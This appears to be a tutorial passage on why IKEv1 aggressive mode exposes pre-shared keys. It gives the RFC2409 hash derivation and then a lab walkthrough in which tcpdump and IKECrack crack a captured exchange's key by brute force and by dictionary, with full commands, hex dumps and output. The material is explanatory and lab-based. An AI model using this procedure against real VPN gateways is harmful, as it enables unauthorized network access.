An exploration of the Intenet Key Exchange (IKE) version 1, IKE version 2, and the different modes in which it operates, aggressive, main and quick.
Another way to exploit aggressive mode is to passively capture packets instead of an active probe. It may be possible to see traffic that is part of an IKE exchange, but not actually contact the IKE responder due to firewalls or some sort of packet filter.
If the initial packets of an aggresssive mode IKE exchange are captured, all of the information that is needed to calculate the responder's hash except for the pre-shared-key is sent in clear text: the nonces, the Diffie-Hellman-Merkel public values, the cookies, identities and all of the algorithms to be used.
Paraphrasing the HASH generation method from RFC2409:
HASH generation parameters
For pre-shared keys: SKEYID = prf(pre-shared-key, Ni_b | Nr_b)
SKEYID is a string derived from secret material known only to the
active players in the exchange.
To authenticate either exchange the initiator of the protocol
generates HASH_I and the responder generates HASH_R where:
HASH_I = prf(SKEYID, g^xi | g^xr | CKY-I | CKY-R | SAi_b | IDii_b )
HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b )
SAi_b is the entire body of the SA payload (minus the ISAKMP
generic header)-- i.e. the DOI, situation, all proposals and all
transforms offered by the Initiator.
CKY-I and CKY-R are the Initiator's cookie and the Responder's
cookie, respectively, from the ISAKMP header.
g^xi and g^xr are the Diffie-Hellman ([DH]) public values of the
initiator and responder respectively.
Nx is the nonce payload; x can be: i or r for the ISAKMP initiator
and responder respectively.
IDx is the identification payload for "x". x can be: "ii" or "ir"
for the ISAKMP initiator and responder respectively during phase
one negotiation; or "ui" or "ur" for the user initiator and
responder respectively during phase two.
Of all of the parameters listed above, SAi_b can be easily calculated from the ISAKMP packet contents, CKY-I and CKY-R -- the cookie values are sent in the clear as are g^xi and g^xr -- the Diffie-Hellman-Merkel public values, as well as Ni_b and Nr_b the nonces and IDii_b and IDir_b -- the identities. SKEYID has to be guessed at since the pre-shared-key isn't known to an eavesdropper. For each calculated guess of SKEYID using the authentication algorithm in the transform set that was agreed upon, a guess can be made at the responders HASH value which is also sent in the clear. If the guess for the reponders HASH is the same as the one that was sent over the wire, we then know the value of the pre-shared-key.
IKECrack is a perl script that takes all of the information available over the wire, and then launches a brute force or a dictionary attack against the pre-shared-key. IKECrack is a bit specific on the format it expects from the output of tcpdump. IKECrack wouldn't work with tcpdump version 4.4, but liked the way the output was formatted from tcpdump version 3.6.1 and ran fine afterwards. It's also really finicky about the caputre file; several aggressive mode caputures that I did didn't work as the initiator couldn't be found, or the responders's hash couldn't be located. However, the IKEv1-aggressive-dynamic.pcap file was able to be parsed correctly.
We'll do a short walkthrough, using the IKEv1 aggressive mode capture previously referenced between SRX-11 and SRX-13. We'll then use IKECrack to figure out what the preshared key is.
First we need to reparse the output of the capture into the format that IKEcrack wants, with the version of tcpdump it likes. IKEcrack expects a hex formatted pcap file using the flags xq from tcpdump.
IKEcrack suitable output from capture file
root@attacker:~# tcpdump-3.6.1 -nxqr IKEv1-aggressive-dynamic.pcap 20:59:00.182845 192.168.11.11.500 > 192.168.13.13.500: udp 417 [tos 0xc0] 45c0 01bd 1863 0000 4011 c6a4 c0a8 0b0b c0a8 0d0d 01f4 01f4 01a9 2bf8 a6fe 2f15 6631 8a1f 0000 0000 0000 0000 0110 0400 0000 0000 0000 01a1 0400 0040 0000 0001 0000 0001 0000 0034 0101 0801 a6fe 2f15 6631 8a1f 0000 0024 0001 0000 8001 0001 8004 0001 8002 0001 800b 0001 000c 0004 0001 5180 8003 0001 0a00 0064 15d7 3dd0 aef1 7090 dfe2 c662 e5d0 cc64 a784 5de3 1ec8 28d6 2068 3f6d b11f c5b9 5e5f 7756 2acb 24be c86d 4fe3 cef0 d8b7 b7be 527e 80dc 6631 ed3f 29a6 b0c5 0243 9d78 ca1d 7a49 b065 9786 64c1 9094 89f9 da15 28d0 9a31 605e 8311 ccd5 9870 db8c 0500 0014 84b4 5002 3c24 d0c3 093f 3bd7 a30a e11f 0d00 000d 0200 0000 7372 7831 310d 0000 14af cad7 1368 a1f1 c96b 8696 fc77 5701 000d 0000 1427 bab5 dc01 ea07 60ea 4e31 90ac 27c0 d00d 0000 1461 05c4 22e7 6847 e43f 9684 8012 92ae cd0d 0000 1444 8515 2d18 b6bb cd0b e8a8 4695 79dd cc0d 0000 14cd 6046 4335 df21 f87c fdb2 fc68 b6a4 480d 0000 1490 cb80 913e bb69 6e08 6381 b5ec 427b 1f0d 0000 147d 9419 a653 10ca 6f2c 179d 9215 529d 560d 0000 144a 131c 8107 0358 455c 5728 f20e 9545 2f00 0000 2069 9369 2287 41c6 d4ca 094c 93e2 42c9 de19 e7b7 c600 0000 0500 0005 00 20:59:00.202093 192.168.13.13.500 > 192.168.11.11.500: udp 348 [tos 0xc0] 45c0 0178 22d8 0000 4011 bc74 c0a8 0d0d c0a8 0b0b 01f4 01f4 0164 83d9 a6fe 2f15 6631 8a1f 690e ec1a 227b ba74 0110 0400 0000 0000 0000 015c 0400 0038 0000 0001 0000 0001 0000 002c 0101 0001 0000 0024 0001 0000 8001 0001 8004 0001 8002 0001 800b 0001 000c 0004 0001 5180 8003 0001 0a00 0064 9c53 4275 1edf 1d43 2e74 7e75 9d56 0b57 3498 0357 4e63 1c50 953b a171 b0b8 693b b134 7d79 0c82 9948 0e75 f807 c9b2 2b13 f20b de05 5047 468b 027d 874b 54cd a1fe 0dcc 94e5 467b b96e c99a e836 97a9 82f6 e29e e638 75da 74eb a80d b9cf e3e8 e188 0500 0014 5e85 7dab 0671 efca d3cf 4040 892b f5e4 0800 000c 0100 0000 c0a8 0d0d 0d00 0014 652e 08ef 95c3 931f 61cc 68c2 5a0d 321d 0d00 0014 afca d713 68a1 f1c9 6b86 96fc 7757 0100 0d00 0014 4a13 1c81 0703 5845 5c57 28f2 0e95 452f 1400 0020 6993 6922 8741 c6d4 ca09 4c93 e242 c9de 19e7 b7c6 0000 0005 0000 0500 1400 0014 84f6 9ece f7c2 93e8 bd41 0fa1 f705 f52a 0000 0014 4816 d8c3 a8dc 9276 4785 d66a 31bc 4e31 20:59:00.207224 192.168.11.11.500 > 192.168.13.13.500: udp 92 [tos 0xc0] 45c0 0078 1864 0000 4011 c7e8 c0a8 0b0b c0a8 0d0d 01f4 01f4 0064 5f96 a6fe 2f15 6631 8a1f 690e ec1a 227b ba74 0810 0401 0000 0000 0000 005c 5d18 aa7b ddc7 c16b f3a5 e1ac 3cd6 b9df 2d07 2674 e0f4 77cd 836c 87ea 1d33 3541 08ac 9bf7 e662 a1df 9739 c1fe 9405 7c7e f766 7146 5e69 ee18 d39b 06a4 378c 22dc 20:59:00.212384 192.168.11.11.500 > 192.168.13.13.500: udp 180 [tos 0xc0] 45c0 00d0 1865 0000 4011 c78f c0a8 0b0b c0a8 0d0d 01f4 01f4 00bc 8554 a6fe 2f15 6631 8a1f 690e ec1a 227b ba74 0810 2001 e046 bb80 0000 00b4 63da e3d0 5266 0d5c 563a 7dc1 2a52 82a8 1c67 79b9 f6d4 530d 483d b412 b497 b437 dfc3 ff0f 98ba 3759 eeb4 7341 422d 78e3 78ea 1519 b40e febe 36a6 26eb 51f6 ac77 731c 4ce9 a473 e945 9570 c956 d6fd c068 4e53 fb4c 626a 155b 1450 3e52 3374 8dd2 c648 9b09 e407 2405 7fe8 d5f7 e565 4921 1e85 8785 e679 ec37 956e 209b cfe2 e3df 8788 225a 0bff 9f23 3fba 14e6 2064 3961 b6ee 824f 1505 0d46 20:59:00.226889 192.168.13.13.500 > 192.168.11.11.500: udp 180 [tos 0xc0] 45c0 00d0 22d9 0000 4011 bd1b c0a8 0d0d c0a8 0b0b 01f4 01f4 00bc 68ad a6fe 2f15 6631 8a1f 690e ec1a 227b ba74 0810 2001 e046 bb80 0000 00b4 8647 a675 f25b 80ca 6b66 e0c6 2549 eedf 5596 f98f f9c6 cafe 82b2 33d1 249d bc91 a13f 33be ddbf 471d 3d32 5e17 e913 1c31 af65 be5b fec7 43c3 b858 6f39 d6ab a153 4a37 285f ba5f 49bc 510f 98c1 d1c9 a991 9a45 b988 53f6 6eed bfe6 3420 5a8d d344 741c e87e a2b5 1416 269d b469 b88c ecc8 eeb3 5931 fed0 b360 ae69 6101 fb09 8337 081f 086a 9435 6512 239c 74d7 59cc f27e bbf6 4a63 83b9 fcb7 20:59:00.237306 192.168.11.11.500 > 192.168.13.13.500: udp 52 [tos 0xc0] 45c0 0050 1866 0000 4011 c80e c0a8 0b0b c0a8 0d0d 01f4 01f4 003c e652 a6fe 2f15 6631 8a1f 690e ec1a 227b ba74 0810 2001 e046 bb80 0000 0034 6324 b77c d5ee 51ed 2a4e fbef af94 dcf0 da9c 60c7 89d5 04cd root@attacker:~#
The output needs to be saved in a file called logfile.dat.
creating logfile.dat for IKEcrack
root@attacker:~# tcpdump-3.6.1 -nxqr IKEv1-aggressive-dynamic.pcap > logfile.dat
Next, IKEcrack can be run on the dump file. It needs the IP address and IKE port of the initiator
fed in as an argument in the format <Initiator IP Address>.<Inititor Port> . You'll
notice that this is the same format as in the output of the hexified tcpdump.
Running IKEcrack in bruteforce mode
root@attacker:~# ikecrack-snarf-1.00.pl 192.168.11.11.500 Looking for Initiator : 192.168.11.11.500 Header IPs 192.168.11.11.500 192.168.13.13.500: Matching Header 192.168.11.11.500 192.168.13.13.500 Init tcookie_i : a6fe2f1566318a1f tcookie_r : 0000000000000000 xchg type: 04 Aggressive Mode - Continue SA_i : 00000001000000010000003401010801a6fe2f1566318a1f0000002400010000800100018004000180020001800b0001000c00040001518080030001 KE_i : 15d73dd0aef17090dfe2c662e5d0cc64a7845de31ec828d620683f6db11fc5b95e5f77562acb24bec86d4fe3cef0d8b7b7be527e80dc6631ed3f29a6b0c502439d78ca1d7a49b065978664c1909489f9da1528d09a31605e8311ccd59870db8c nonce_i : 84b450023c24d0c3093f3bd7a30ae11f ID_i : 020000007372783131 Header IPs 192.168.13.13.500 192.168.11.11.500: Reply Header? 192.168.13.13.500 192.168.11.11.500 Resp tcookie_i : a6fe2f1566318a1f tcookie_r : 690eec1a227bba74 xchg type: 04 Aggressive Mode - Continue SA_r : 00000001000000010000002c010100010000002400010000800100018004000180020001800b0001000c00040001518080030001 KE_r : 9c5342751edf1d432e747e759d560b57349803574e631c50953ba171b0b8693bb1347d790c8299480e75f807c9b22b13f20bde055047468b027d874b54cda1fe0dcc94e5467bb96ec99ae83697a982f6e29ee63875da74eba80db9cfe3e8e188 nonce_r : 5e857dab0671efcad3cf4040892bf5e4 ID_r : 01000000c0a80d0d HASH_r : 652e08ef95c3931f61cc68c25a0d321d Header IPs 192.168.11.11.500 192.168.13.13.500: Header IPs 192.168.11.11.500 192.168.13.13.500: Header IPs 192.168.13.13.500 192.168.11.11.500: Header IPs 192.168.11.11.500 192.168.13.13.500: Initiator_ID - Type unknown: Responder_ID - Type is IPv4: 192.168.13.13 Responder Sent MD5 HASH_R : 652e08ef95c3931f61cc68c25a0d321d Starting Grinder............. No dictionary file found - skipping to bruteforce Hint: create the file "wordlist" for a dictionary attack Starting Bruteforce Attack: Character Set: a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9 A B C D E F G H I J K L M N O P Q R S T U V W X Y Z Character 1 Done : Time 0 seconds Character 2 Done : Time 0 seconds Character 3 Done : Time 2 seconds Character 4 Done : Time 77 seconds
As bruteforcing can take quite a while, especially since our IKE password has 8 characters, we'll use
a dictionary file instead. This dictionary needs to be called wordlist. IKEcrack doesn't
do any fancy transformations or substitutions with the wordlist, so the dictionary needs to contain the
exact password (or a collision if you can find one). If the file wordlist exists, IKEcrack will run
in dictionary mode.
IKEcrack running with a dictionary
root@attacker:~# ikecrack-snarf-1.00.pl 192.168.11.11.500 Looking for Initiator : 192.168.11.11.500 Header IPs 192.168.11.11.500 192.168.13.13.500: Matching Header 192.168.11.11.500 192.168.13.13.500 Init tcookie_i : a6fe2f1566318a1f tcookie_r : 0000000000000000 xchg type: 04 Aggressive Mode - Continue SA_i : 00000001000000010000003401010801a6fe2f1566318a1f0000002400010000800100018004000180020001800b0001000c00040001518080030001 KE_i : 15d73dd0aef17090dfe2c662e5d0cc64a7845de31ec828d620683f6db11fc5b95e5f77562acb24bec86d4fe3cef0d8b7b7be527e80dc6631ed3f29a6b0c502439d78ca1d7a49b065978664c1909489f9da1528d09a31605e8311ccd59870db8c nonce_i : 84b450023c24d0c3093f3bd7a30ae11f ID_i : 020000007372783131 Header IPs 192.168.13.13.500 192.168.11.11.500: Reply Header? 192.168.13.13.500 192.168.11.11.500 Resp tcookie_i : a6fe2f1566318a1f tcookie_r : 690eec1a227bba74 xchg type: 04 Aggressive Mode - Continue SA_r : 00000001000000010000002c010100010000002400010000800100018004000180020001800b0001000c00040001518080030001 KE_r : 9c5342751edf1d432e747e759d560b57349803574e631c50953ba171b0b8693bb1347d790c8299480e75f807c9b22b13f20bde055047468b027d874b54cda1fe0dcc94e5467bb96ec99ae83697a982f6e29ee63875da74eba80db9cfe3e8e188 nonce_r : 5e857dab0671efcad3cf4040892bf5e4 ID_r : 01000000c0a80d0d HASH_r : 652e08ef95c3931f61cc68c25a0d321d Header IPs 192.168.11.11.500 192.168.13.13.500: Header IPs 192.168.11.11.500 192.168.13.13.500: Header IPs 192.168.13.13.500 192.168.11.11.500: Header IPs 192.168.11.11.500 192.168.13.13.500: Initiator_ID - Type unknown: Responder_ID - Type is IPv4: 192.168.13.13 Responder Sent MD5 HASH_R : 652e08ef95c3931f61cc68c25a0d321d Starting Grinder............. Reading Dictionary File Starting Dictionary Attack: match with juniper123 Calc MD5 HASH_R : 652e08ef95c3931f61cc68c25a0d321d Calc SKEYID : 93ea4474072b5f5cd711002394d1e41a root@attacker:~#
And we have the password! I cheated a bit on this one as I added the actual password onto the end of the dictionary I was using.